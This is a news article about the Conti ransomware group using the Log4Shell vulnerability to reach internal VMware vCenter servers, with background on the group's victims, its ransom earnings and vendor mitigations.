Conti ransomware was found to be using a critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.
It is only a matter of time before Conti and possibly other groups start using Log4j2 to its full potential. It is recommended that vulnerable systems be patched immediately and that Log4j2 be recognized as an attack tool by ransomware groups.
Conti wasted no time in adopting this new attack method, and is known as the first “top-tier” threat group to use the Log4j vulnerability as a weapon.
Targeting vulnerable vCenter
On December 9, a proof-of-concept (PoC) exploit for CVE-2021-44228 (aka Log4Shell) was released.
A day later, a mass scan of the Internet was launched, and multiple threat groups began searching for vulnerable systems. The first to take advantage of this bug were cryptocurrency miners, botnets, and a new ransomware called “Khonsari”.
By December 15, the threat groups using Log4Shell had expanded to include nation-state hackers and initial access brokers who sell network access to ransomware groups.
On December 12, Conti, one of the largest ransomware gangs with dozens of members who seemed interested in Log4Shell, decided that it could be a means of attack and began looking for new targets.
AdvIntel, a cybercrime and hostile activity fighting company, said the goal was to move laterally into the VMware vCenter network.
Several dozen vendors have been affected by Log4Shell and are rushing to patch their products and provide workarounds and mitigations to their customers.
VMware is one such company, citing 40 vulnerable products.
The company has provided mitigations and fixes, but no patches for the affected vCenter versions are available yet.
The vCenter server is not normally exposed on the Internet, but an attacker could take advantage of this vulnerability.
Threat groups with network access to affected VMware products could exploit this issue to gain full control of the target system and conduct a denial of service attack.
https://www.vmware.com/security/advisories/VMSA-2021-0028.html
According to AdvIntel, the Conti ransomware group was interested in leveraging Log4Shell with a publicly available exploit.
Log4Shell moves horizontally
The report notes that “this is the first time that this vulnerability has entered the attack methodology of a major ransomware group.”
This exploit led to multiple use cases where the Conti group tested the possibility of using the Log4J exploit
While many companies are focused on blocking Log4Shell attacks on devices exposed to the Internet, the Conti ransomware shows that this vulnerability can be exploited to target internal devices that have received little attention.
We have confirmed that the Conti ransomware cooperative group has already infiltrated the targeted network and exploited a vulnerable Log4j machine to access the vCenter server.
This means that members of the Conti ransomware have compromised the network with different initial access methods (RDP, VPN, email phishing) and are now using Log4Shell to move laterally across the network.
Conti is a Russian-speaking group that has long been involved in ransomware activity as the successor to the famous Ryuk.
This group has carried out hundreds of attacks, and their data leak site lists over 600 affected companies that did not pay the ransom. In addition to this, some companies have paid the ransom to have their data decrypted.
Cybersecurity firm Group-IB estimates that about 30 percent of ransomware victims choose to pay the ransom and use the attacker’s decryption tool to restore their files.
Recently, the Australian Cyber Security Centre (ACSC) issued an alert on the Conti ransomware that targeted several organizations in the country. One of the victims is CS Energy, a power company.
Frontier Software, a provider of payroll software used by the Australian government, was also hit by Conti, resulting in the loss of data on tens of thousands of government employees.
More recently, McMenamins, a chain of breweries and hotels in the US states of Oregon (Portland) and Washington, has been affected.
The Conti ransomware has been operating under this name since June 2020, and according to information from AdvIntel, the group has exploited more than $150 million from victims in the past six months.
Comments